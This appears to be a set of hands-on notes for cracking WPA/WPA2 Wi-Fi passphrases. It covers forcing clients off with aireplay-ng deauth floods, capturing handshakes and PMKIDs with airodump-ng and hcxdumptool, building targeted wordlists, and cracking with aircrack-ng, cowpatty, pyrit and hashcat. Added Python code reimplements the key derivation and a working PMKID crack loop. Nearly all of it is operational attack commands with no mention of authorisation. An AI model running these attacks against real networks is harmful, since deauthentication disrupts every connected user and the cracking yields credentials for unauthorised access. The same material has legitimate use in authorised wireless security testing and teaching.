WPA/WPA2

Standard approach - 4-way handshake capture (no roaming/PMKID support needed, but a connected client is)

Deauthenticate a supplicant

With airodump-ng already capturing on the AP's channel (-c <channel> --bssid <ap_mac> -w <prefix>), kick a client off so it reconnects and redoes the 4-way handshake:

aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1. Omitting -c sends the deauth to the broadcast address, which hits every client at once and is often the quickest way to get a handshake
2. airodump-ng shows "WPA handshake: <ap_mac>" in its top-right corner once the EAPOL frames are in the capture

Dictionary generation

Concatenate + Uppercase

Two base words glued together, each with or without its first letter uppercased: WifiKey, Networkkey, ...

nano lower_dico.txt    # one lowercase base word per line (wifi, key, network, ...)
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt    # uppercase the first letter (GNU sed \U)
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort -u > concatenated.txt

One separator + Uppercase

Same idea with a separator between the two words. Run it once per separator (-_$* are the usual ones) and append to the same output file: Wifi-key, Network-Key, ...

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
# -a 1 combines the two lists; -j applies a rule to the left-hand word, $<SEPARATOR> appends the separator to it
hashcat -a 1 upper_dico.txt lower_dico.txt -j '$<SEPARATOR>' --stdout >> ul_separated.txt
hashcat -a 1 upper_dico.txt upper_dico.txt -j '$<SEPARATOR>' --stdout >> uu_separated.txt

Two separators + Uppercase

Three capitalized words with the same separator twice, reusing uu_separated.txt from the previous step as the right-hand list: Wifi-Key-Network, Mobile-Wifi-Key, ...

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
hashcat -a 1 upper_dico.txt uu_separated.txt -j '$<SEPARATOR>' --stdout >> uuu_separated.txt

Add rules

Each generated dictionary can be expanded further by running a hashcat rule file over it (best64 appends digits, toggles case, reverses, ...). Deduplicate afterwards: rules produce many collisions.

cat <created_dico.txt> | hashcat -r /usr/share/hashcat/rules/best64.rule --stdout | sort -u > <final_dico.txt>
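The four dictionary steps above, reproduced in Python as an added example (it is not part of the original notes and not how hashcat-utils or hashcat are implemented). The base words wifi/key/network and the rule list are constructed for the example; the rule engine only emulates a handful of hashcat rule functions (: l u c r $X ^X), enough to see what `-r best64.rule --stdout` does to a candidate.

```python
"""Added example, not from the original notes: builds the same candidate wordlist
as the combinator.bin / hashcat -a 1 -j '$<sep>' / -r best64.rule steps above, in
plain Python, so the output shape and size can be checked before a GPU run."""
import itertools
from typing import Iterable, List

SEPARATORS = ["-", "_", "$", "*"]

# Constructed base list standing in for lower_dico.txt (one lowercase word per line).
BASE_WORDS = ["wifi", "key", "network"]

# Constructed rule list; best64.rule is much longer, only the functions below are emulated.
DEFAULT_RULES = [":", "$1", "$1 $2 $3", "u", "$!"]


def capitalize_first(word: str) -> str:
    """Same as sed 's/^\\(.\\)/\\U\\1/': uppercase only the first character."""
    return word[:1].upper() + word[1:]


def concatenated(words: Iterable[str]) -> List[str]:
    """ll + lu + ul + uu lists: every ordered pair (self-pairs included, like combinator.bin)."""
    words = list(words)
    out = set()
    for a, b in itertools.product(words, repeat=2):
        for x in (a, capitalize_first(a)):
            for y in (b, capitalize_first(b)):
                out.add(x + y)
    return sorted(out)


def one_separator(words: Iterable[str], separators: Iterable[str] = SEPARATORS) -> List[str]:
    """ul_separated + uu_separated: Upper<sep>lower and Upper<sep>Upper, once per separator."""
    words = list(words)
    out = set()
    for sep in separators:
        for a, b in itertools.product(words, repeat=2):
            out.add(capitalize_first(a) + sep + b)
            out.add(capitalize_first(a) + sep + capitalize_first(b))
    return sorted(out)


def two_separators(words: Iterable[str], separators: Iterable[str] = SEPARATORS) -> List[str]:
    """uuu_separated: Upper<sep>Upper<sep>Upper with the same separator used twice."""
    words = list(words)
    out = set()
    for sep in separators:
        for triple in itertools.product(words, repeat=3):
            out.add(sep.join(capitalize_first(w) for w in triple))
    return sorted(out)


def apply_rule(rule: str, word: str) -> str:
    """Tiny subset of hashcat rule syntax: ':' noop, l/u/c case, r reverse, $X append, ^X prepend.
    Functions may be separated by spaces, as in best64.rule. Anything else is rejected."""
    i = 0
    while i < len(rule):
        op = rule[i]
        i += 1
        if op in " :":
            continue
        if op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = capitalize_first(word.lower())
        elif op == "r":
            word = word[::-1]
        elif op in "$^":
            ch = rule[i]
            i += 1
            word = word + ch if op == "$" else ch + word
        else:
            raise ValueError(f"unsupported rule function {op!r} in {rule!r}")
    return word


def build_dictionary(words: Iterable[str] = BASE_WORDS, rules: Iterable[str] = DEFAULT_RULES) -> List[str]:
    """All three generated lists, each rule applied to each candidate, deduplicated (sort -u)."""
    words, rules = list(words), list(rules)
    candidates = concatenated(words) + one_separator(words) + two_separators(words)
    return sorted({apply_rule(rule, c) for c in candidates for rule in rules})


if __name__ == "__main__":
    dico = build_dictionary()
    print(f"{len(dico)} candidates, e.g. {dico[:5]}")
```

With three base words the three lists alone are 36 + 72 + 108 = 216 candidates before rules; the count grows with the square and cube of the base list, which is why the base list should stay short and targeted (SSID words, company name, street, ...).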

Crack

aircrack

# -b restricts cracking to one BSSID when the capture holds several networks
aircrack-ng -w <dico> -b <ap_mac> <cap.pcap>

Precomputed PMK tables - cowpatty

Not true rainbow tables: genpmk runs PBKDF2 once per word and stores the resulting PMKs, so a table is only valid for the ESSID it was built with (the ESSID is the PBKDF2 salt). Worth it when several captures of the same ESSID are expected.

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

Pyrit is unmaintained (Python 2 only) and mostly of historical interest; the hashcat workflow below is the usual GPU path now.

pyrit eval                                  # show what is in the database
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrit batch                                 # precompute PMKs for every ESSID/password pair
pyrit -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace                    # drop the database when done, it grows quickly

GPU - hashcat

Convert the capture to hccapx with cap2hccapx (hashcat-utils, or the online converter at https://hashcat.net/cap2hccapx/), then run mode 2500 (WPA-EAPOL-PBKDF2). On Linux the binary is just hashcat; hashcat64.exe is the old Windows build name.

hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt

hashcat 6.x deprecates -m 2500 and -m 16800 in favour of -m 22000, whose input file is produced by hcxpcapngtool (hcxtools) straight from the pcap/pcapng and holds both 4-way handshakes and PMKIDs.

Roaming - PMKID attack

Clientless: the AP sends the PMKID in the RSN IE of the first EAPOL frame, so a single association attempt by the attacker is enough, no connected client and no deauth. It only works against APs that include the PMKID, i.e. roaming/PMK caching (802.11r) enabled, which is common but not universal.

Installation
apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt

Attack

1. Traffic capture

Opportunistic attack without MAC filtering

hcxdumptool takes over the interface itself (stop NetworkManager and wpa_supplicant first, they fight it for the card). The flags below are the hcxdumptool 5.x ones; the option set changed in later releases, check --help.

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSIDs

Put the BSSIDs in a file, one per line, uppercase hex with the ":" separators removed (--filtermode=2 treats the list as targets to attack).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3

2. PCAP to hashes

# -z writes one PMKID per line in hashcat 16800 format: PMKID*AP_MAC*STA_MAC*ESSID_hex
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3. Crack

Solution 1 - PMKID
Run hashcat in mode WPA-PMKID-PBKDF2 (-m 16800) on <out.hashes>, with the same dictionaries and rules as for -m 2500.

Solution 2 - 4-way handshakes captured in the same run
hcxdumptool also collects EAPOL handshakes from clients it sees; -o extracts those to hccapx. That file is cracked with WPA-EAPOL-PBKDF2 (-m 2500), not a PMKID mode, and is empty if no client handshake was captured.

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

With hashcat 6.x both are superseded by -m 22000: hcxpcapngtool -o <hash.22000> <pmkid.pcap> writes PMKIDs and handshakes into one hash file.
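What all the crackers on this page (aircrack-ng, genpmk/cowpatty, hashcat -m 2500 and -m 16800) actually compute, as an added example in Python that is not part of the original notes or of any of those tools. It shows why genpmk tables are bound to one ESSID (the ESSID is the PBKDF2 salt), why the handshake attack needs a client (the PTK mixes both nonces) and why the PMKID attack does not (PMKID depends only on PMK and the two MACs), and it parses the hcxpcaptool -z line format. The AP MAC is the example BSSID from the notes; the client MAC, ESSID, nonces, EAPOL bytes and passphrase are constructed here, not from a real capture.

```python
"""Added example, not from the original notes: the arithmetic behind aircrack-ng,
genpmk/cowpatty, hashcat -m 2500 and -m 16800, plus a parser for the hcxpcaptool -z
(16800) line format. All MACs, nonces, frames and the passphrase below are
constructed for the example, not taken from a real capture."""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).
    The ESSID is the salt: this is the slow step, and why genpmk tables are per ESSID (-s)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC).
    The AP puts it in the RSN IE of EAPOL message 1, so no client handshake is needed."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def prf(key: bytes, label: bytes, data: bytes, nbytes: int = 48) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..., truncated.
    WPA2-CCMP derives a 48-byte PTK (KCK || KEK || TK); the KCK is the first 16 bytes either way."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range((nbytes + 19) // 20))
    return b"".join(blocks)[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK needs both nonces, which is why the 4-way handshake (forced by the deauth) must be captured."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_pmkid(target: bytes, essid: str, ap_mac: bytes, sta_mac: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    """What hashcat -m 16800 does per candidate: one PBKDF2 plus one HMAC."""
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, essid), ap_mac, sta_mac), target):
            return candidate
    return None


def crack_handshake(target_mic: bytes, essid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                    snonce: bytes, eapol_mic_zeroed: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """What aircrack-ng / cowpatty / hashcat -m 2500 do per candidate: PBKDF2, PRF, HMAC, compare MIC."""
    for candidate in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, essid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_mic_zeroed), target_mic):
            return candidate
    return None


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """hcxpcaptool -z output: PMKID*AP_MAC*STA_MAC*ESSID_hex (lowercase hex, no separators)."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex), bytes.fromhex(sta_hex), bytes.fromhex(essid_hex).decode()


def crack_16800_line(line: str, wordlist: Iterable[str]) -> Optional[str]:
    target, ap_mac, sta_mac, essid = parse_16800(line)
    return crack_pmkid(target, essid, ap_mac, sta_mac, wordlist)


# Constructed sample: AP 50:d7:22:57:ac:2f (the example BSSID from the notes), a made-up client,
# ESSID "HomeNet", passphrase "Wifi-Key". The 16800 line is generated here, not from a real capture.
AP_MAC = bytes.fromhex("50d72257ac2f")
STA_MAC = bytes.fromhex("a4c3f0112233")
ESSID = "HomeNet"
SECRET = "Wifi-Key"
SAMPLE_16800 = "*".join([pmkid(pmk_from_passphrase(SECRET, ESSID), AP_MAC, STA_MAC).hex(),
                         AP_MAC.hex(), STA_MAC.hex(), ESSID.encode().hex()])

if __name__ == "__main__":
    print("16800 line:", SAMPLE_16800)
    print("recovered :", crack_16800_line(SAMPLE_16800, ["wifikey", "WifiKey", "Wifi_Key", "Wifi-Key"]))
```

The cost per candidate is dominated by the 4096-round PBKDF2 in both attacks; the PMKID path only saves the PRF and the need for a client, which is why a GPU and a tight dictionary matter more than the choice between -m 2500 and -m 16800.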